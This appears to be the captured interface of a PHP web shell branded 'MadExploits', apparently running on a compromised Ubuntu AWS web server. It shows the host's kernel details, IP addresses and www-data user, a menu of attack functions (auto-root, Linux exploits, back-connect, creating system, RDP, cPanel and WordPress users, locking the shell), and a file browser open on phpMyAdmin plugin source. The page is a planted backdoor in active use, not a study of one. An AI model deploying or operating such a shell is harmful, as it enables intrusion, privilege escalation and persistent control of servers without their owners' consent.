Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.17.60.86
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxr-xr-x
Export
[ DIR ]
drwxr-xr-x
Import
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Transformations
[ DIR ]
drwxr-xr-x
TwoFactor
[ DIR ]
drwxr-xr-x
AuthenticationPlugin.php
10.08
KB
-rw-r--r--
AuthenticationPluginFactory.ph...
1.05
KB
-rw-r--r--
ExportPlugin.php
10.17
KB
-rw-r--r--
IOTransformationsPlugin.php
1.94
KB
-rw-r--r--
ImportPlugin.php
1.57
KB
-rw-r--r--
SchemaPlugin.php
2.53
KB
-rw-r--r--
TransformationsInterface.php
1.39
KB
-rw-r--r--
TransformationsPlugin.php
1.18
KB
-rw-r--r--
TwoFactorPlugin.php
3.49
KB
-rw-r--r--
UploadInterface.php
551
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TransformationsInterface.php
<?php /** * Interface for the transformations plugins */ declare(strict_types=1); namespace PhpMyAdmin\Plugins; use PhpMyAdmin\FieldMetadata; /** * Provides a common interface that will have to be implemented by all of the * transformations plugins. */ interface TransformationsInterface { /** * Gets the transformation description */ public static function getInfo(): string; /** * Gets the specific MIME type */ public static function getMIMEType(): string; /** * Gets the specific MIME subtype */ public static function getMIMESubtype(): string; /** * Gets the transformation name of the specific plugin */ public static function getName(): string; /** * Does the actual work of each specific transformations plugin. * * @param string $buffer text to be transformed * @param mixed[] $options transformation options * @param FieldMetadata|null $meta meta information * * @return string the transformed text */ public function applyTransformation( string $buffer, array $options = [], FieldMetadata|null $meta = null, ): string; /** * Returns true if the element requires no wrapping * * @param mixed[] $options transformation options */ public function applyTransformationNoWrap(array $options = []): bool; }
Close